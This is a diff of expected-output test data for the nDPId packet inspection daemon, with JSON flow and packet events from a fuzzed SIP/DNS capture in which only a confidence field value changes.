00951{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1120470098867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"thread_ts_msec":1120470098867,"pkt":"ADBUADBWAOBxAW69CABFAAGTao0AAIARzIzAqQECyER4URPEE8QBf5mcQ0FOQ0VMIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7YnJhbmNoPXo5aEc0YktucDEwNKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470098867,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470098867,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470100319,"flow_last_seen":1120470100319,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470100319,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1120470100319,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470100319,"pkt":"ADBUADRWAODtAW69CABFAABEao4AAIARTMfAqAECwKgBAQrBADUAMNwvSM4AAAABAAAAAAAAATEBMAEwAzEyNwdUbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470100319,"flow_last_seen":1120470100319,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470100319,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.tn-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470100319,"flow_last_seen":1120470100319,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470100319,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.tn-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1120470100321,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470100321,"pkt":"AODt9W69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CsEAR76rSM6AAAABAAEAAAAAATEBMAEwAzUyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhdGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470100321,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.527.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470100321,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.527.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470102883,"flow_last_seen":1120470102883,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470102883,"l3_proto":"ip4","src_ip":"192.86.1.2","dst_ip":"200.68.120.99","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00951{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1120470102883,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"thread_ts_msec":1120470102883,"pkt":"ADBUADRWAODtAW69CABFAAGTapAAAIARzInAVgECyER4YxPEE8QBf5mcQ0FOQ0VMIHFpcDo5NzIzOTI4NzCiNEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7YnJhbmNoPXo5aEc0YktucDEwNDk4NDA1My00NGNlNGE0MTE5Mi4xNjguMS4yO3Jwb3J0DQpGcm9tOiAiYXJpayIgPHNpcD44MTY2NjZAdm9pcC5icnVyanVsYS5uZXQ+O3RxZz02NDMzZWY5DQpUbzogPHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0Pg0KQ2FsbC1JRDogMTA1MDkwMjU5LTQ0NmZhZjdhQDE5Mi4xNjguMS4yDQpDc2VxOiAxIENBTkNFTA0KQ29udGVudC1MZW5ndGg6IDANCk1heC1Gb3J3YXJkczogNzANClVzZXItQWdlbnQ6IE5lcm8gU0lQUFMgSVAgUGhvbmUgVmVyc2lvbiAyLjAuNTEuMTYNCo0K"} 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":265,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469921898,"flow_last_seen":1120469930905,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470102883,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -448,76 +448,76 @@ 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470114910,"flow_last_seen":1120470114910,"flow_idle_time":620000,"flow_min_l4_payload_len":383,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1120470114910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","l4_proto":118,"flow_datalink":1,"flow_max_packets":3} 00951{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1120470114910,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"thread_ts_msec":1120470114910,"pkt":"ADBUADRWAOTtAW69CABFAAGTapgAAIB2zIHAqAECyER4URPEE8QBf5mcQ0FOQ0VMIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEu2WV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7YnJhbmNoPXo5aEc0YktucDEwNDk4NDA1My00NGNlNGE0MTE5Mi4xNjguMS4yO3Jwb3J0DQpGcm9tOiAiYXJpayIgPKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1120470115340,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470115340,"pkt":"ADBUADRWAODtAW69CABFAABIapkAAIARTLjAqAECwKgBAQrCADUANKwzfc8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaVd5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470113337,"flow_last_seen":1120470115340,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1120470115340,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberciwy.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470113337,"flow_last_seen":1120470115340,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1120470115340,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberciwy.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470116279,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470116279,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469921898,"flow_last_seen":1120469930905,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470116279,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1120469540839,"flow_last_seen":1120470114299,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1492,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470116279,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1120469540839,"flow_last_seen":1120470114299,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1492,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470116279,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470117343,"flow_last_seen":1120470117343,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"14.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1120470117343,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470117343,"pkt":"ADBUADRWAOBJAW69CABFAABIapoAAIARTLcOqAECwKgBAQrCADUANKwzfc8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470117343,"flow_last_seen":1120470117343,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"14.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470117343,"flow_last_seen":1120470117343,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"14.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1120470121594,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470121594,"pkt":"ADBUADRWAODtAW69CABFAABIapsAAIARTLbAqAECwKgBAQrCADUANKwzfc8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470113337,"flow_last_seen":1120470121594,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469938907,"flow_last_seen":1120469938908,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470113337,"flow_last_seen":1120470121594,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469938907,"flow_last_seen":1120469938908,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469939223,"flow_last_seen":1120469939223,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.84.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469940218,"flow_last_seen":1120469948230,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470129591,"flow_last_seen":1120470129591,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 